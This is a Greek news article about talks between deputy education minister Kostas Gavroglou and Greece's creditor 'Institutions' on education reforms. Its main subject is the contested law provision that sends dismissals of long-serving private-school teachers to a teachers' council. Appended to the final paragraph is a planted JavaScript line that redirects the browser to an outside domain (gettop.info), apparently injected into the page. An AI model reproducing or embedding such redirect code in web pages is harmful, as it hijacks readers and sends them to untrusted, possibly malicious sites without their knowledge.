Οι περιορισμοί στις απολύσεις των ιδιωτικών εκπαιδευτικών στο τραπέζι με τους Θεσμούς

0
6

 

Κατά τις επαφές του υπυοργού Παιδείας Κώστα Γαβρόγλου με τους Θεσμούς συζητήθηκε το τριετές σχέδιο για τις μεταρρυθμίσεις στην παιδεία αλλά και ο νόμος για την ιδιωτική εκπαίδευση.

Σύμφωνα με πηγές που πρόσκεινται στην ηγεσία του υπουργείου, τις οποίες επικαλείται το Αθηναϊκό Πρακτορείο, το κλίμα ήταν «πάρα πολύ καλό» σχετικά με τις εκπαιδευτικές μεταρρυθμίσεις που περιλαμβάνονται στο τριετές πλάνο, το οποίο αναμένεται να προχωρήσει χωρίς εμπόδια από πλευράς θεσμών.

Ωστόσο, το «αγκάθι» της συνάντησης ήταν, για ακόμη μια φορά, το θέμα της διάταξης του νόμου για την ιδιωτική εκπαίδευση, που αφορά στις απολύσεις των εκπαιδευτικών.

Σύμφωνα πάντα με πηγές του υπουργείου, ο κ. Γαβρόγλου επαναδιατύπωσε τη θέση που είχε διατυπώσει στο παρελθόν και ο κ. Φίλης, ότι δεν μπορεί να υπάρξει καμία αλλαγή, αφού πλέον είναι ψηφισμένος νόμος του κράτους.

Υπενθυμίζεται, ότι, σύμφωνα με το νόμο Φίλη, οι απολύσεις εκπαιδευτικών που εργάζονται σε ένα ιδιωτικό σχολείο για περισσότερα από δύο χρόνια, θα παραπέμπονται για κρίση σε συμβούλιο εκπαιδευτικών στα πρότυπα των δημοσίων σχολείων.

Η διάταξη αυτή έχει προκαλέσει την αντίθεση, όχι μόνο των ιδιοκτητών των ιδιωτικών σχολείων, αλλά και των Θεσμών, καθώς θεωρήθηκε «προάγγελος» για επέκταση και σε άλλους τομείς της ιδιωτικής οικονομίας.

Για το συγκεκριμένο ζήτημα πάντως, αναμένεται να υπάρξει συνέχεια, καθώς θεωρείται βέβαιο ότι θα πραγματοποιηθεί σύντομα και νέα συνάντηση του υπουργού Παιδείας με τους Θεσμούς. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here